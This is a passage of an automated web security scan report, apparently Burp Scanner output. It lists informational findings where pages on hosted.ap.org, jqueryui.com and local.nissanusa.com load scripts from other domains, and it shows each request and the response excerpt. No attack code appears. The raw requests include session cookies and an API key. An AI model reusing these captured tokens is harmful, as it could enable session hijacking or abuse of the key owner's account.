ETag: "165f8156655ef6c654db78ed23ee3d2f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:43:22 GMT; HttpOnly
Content-Length: 23471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
to find and post events, concerts, festivals, live music, and other things to do near you. Zvents is a free search engine where you can search for what to do by location, time, or event type." />


<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
<!-- START SC TAG -->
<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...
<!-- START DART SCRIPT -->
<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.205. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE&TEMPLATE= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.206. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Sat, 29 Jan 2011 04:49:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:19 GMT
Content-Length: 32594
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.207. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html?CN=AP707&valid=NO&set=new&view=quote&ticker= HTTP/1.1
Host: hosted.ap.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html;charset=utf-8
Expires: Sat, 29 Jan 2011 04:49:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:49:22 GMT
Content-Length: 26005
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Business - BostonHerald
...[SNIP]...
<!-- END GLOBAL CONTENT -->
<script type="text/javascript" src="http://ibd.morningstar.com/quicktake/standard/client/shell/cobrand.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://ibd.morningstar.com/quicktake/standard/client/shell/GetSecList.axd?cn=AP707&ticker=&items=30&pages=10&pageno=0"></script>
...[SNIP]...
</h3>

Daily Stock Quotes sent right to your phone.
<script type='text/javascript' src='http://www.4info.net/js/auto_jump.js'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.208. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=MABOH; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/javascript
Vary: Accept-Encoding
Expires: Fri, 28 Jan 2011 21:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 21:57:28 GMT
Connection: close
Content-Length: 8304

document.write( '<!--GLOBAL FALSE FOR PROXY-PARTIAL-->');
document.write( '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">');
...[SNIP]...
</style>');
document.write( ' <script type="text/javascript" src="http://ibd.morningstar.com/AP/graph.js"></script>
...[SNIP]...

18.209. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:50:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

18.210. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:50:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117007

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...

18.211. http://local.nissanusa.com/albany-schenectady-troy-ny-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /albany-schenectady-troy-ny-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albany-schenectady-troy-ny-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=12201; expires=Sat, 05-Feb-2011 04:53:18 GMT; path=/
Set-Cookie: localDMA=albany-schenectady-troy-ny-area; expires=Sat, 05-Feb-2011 04:53:18 GMT; path=/
Content-Length: 135768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.212. http://local.nissanusa.com/albuquerque-santa-fe-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /albuquerque-santa-fe-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /albuquerque-santa-fe-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=87101; expires=Sat, 05-Feb-2011 04:57:37 GMT; path=/
Set-Cookie: localDMA=albuquerque-santa-fe-area; expires=Sat, 05-Feb-2011 04:57:37 GMT; path=/
Content-Length: 106522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.213. http://local.nissanusa.com/atlanta-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /atlanta-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /atlanta-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:55:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:55:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=30303; expires=Sat, 05-Feb-2011 04:55:20 GMT; path=/
Set-Cookie: localDMA=atlanta-area; expires=Sat, 05-Feb-2011 04:55:20 GMT; path=/
Content-Length: 129057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.214. http://local.nissanusa.com/austin-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /austin-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /austin-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:54:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=78701; expires=Sat, 05-Feb-2011 04:54:22 GMT; path=/
Set-Cookie: localDMA=austin-area; expires=Sat, 05-Feb-2011 04:54:22 GMT; path=/
Content-Length: 110636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.215. http://local.nissanusa.com/baltimore-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /baltimore-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /baltimore-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: downScroll=deleted; expires=Fri, 29-Jan-2010 04:52:56 GMT
Set-Cookie: localZIP=21201; expires=Sat, 05-Feb-2011 04:52:57 GMT; path=/
Set-Cookie: localDMA=baltimore-area; expires=Sat, 05-Feb-2011 04:52:57 GMT; path=/
Content-Length: 171708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.216. http://local.nissanusa.com/boston-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /boston-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /boston-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=02201; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Set-Cookie: localDMA=boston-area; expires=Sat, 05-Feb-2011 04:52:34 GMT; path=/
Content-Length: 155520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.217. http://local.nissanusa.com/chicago-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /chicago-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /chicago-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:51:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:51:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=60601; expires=Sat, 05-Feb-2011 04:51:58 GMT; path=/
Set-Cookie: localDMA=chicago-area; expires=Sat, 05-Feb-2011 04:51:58 GMT; path=/
Content-Length: 139873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.218. http://local.nissanusa.com/cincinnati-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /cincinnati-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cincinnati-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=45201; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Set-Cookie: localDMA=cincinnati-area; expires=Sat, 05-Feb-2011 04:52:10 GMT; path=/
Content-Length: 125013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...
<!-- BEGIN: Google Map -->
<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.219. http://local.nissanusa.com/cleveland-area

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /cleveland-area

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cleveland-area HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:52:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:52:10 GMT
Connection: close
